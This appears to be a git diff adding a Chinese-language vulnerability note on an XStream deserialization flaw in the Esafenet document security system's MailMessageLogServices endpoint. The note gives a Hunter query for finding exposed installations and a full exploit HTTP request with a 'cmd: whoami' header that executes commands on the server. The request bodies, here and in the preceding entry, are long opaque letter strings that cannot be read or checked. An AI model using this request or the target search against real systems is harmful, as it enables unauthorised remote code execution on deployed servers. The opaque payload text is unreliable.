OBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLD
AKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNN
BINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706607230273-16b9d714-4e56-4cc6-a77b-349a68389d00.png](./img/y8FWroxGA2nCEQ2w/1706607230273-16b9d714-4e56-4cc6-a77b-349a68389d00-702061.png) + + + +> 更新: 2024-04-20 22:01:31 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zi1q4mnm7ecvd2vc> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统MailMessageLogServices存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统MailMessageLogServices存在xstream反序列化漏洞.md new file mode 100644 index 0000000..69754ae --- /dev/null 
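Review bot: the request body in this hunk is one opaque multi-kilobyte string and nothing on the page says what it encodes or how it was generated, so a reader can neither verify it nor tell which deserialization sink it targets; add a one-line description of the payload's structure (or a pointer to the step that produces it) and, since the entry ends with only a screenshot and the `> 原文:` link, a sentence on the vendor fix or a blocking rule so the entry is usable for defence and not only for reproduction.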
+++ b/亿赛通电子文档安全管理系统MailMessageLogServices存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统MailMessageLogServices存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统MailMessageLogServices存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/DgrdPy_Vw0EsYXrS/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-303965.png) + +# 四、漏洞复现 +```java +POST /CDGServer3/MailMessageLogServices HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: {hosname} +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNG
MDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPOD
PLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMK
IBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJ
ANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJI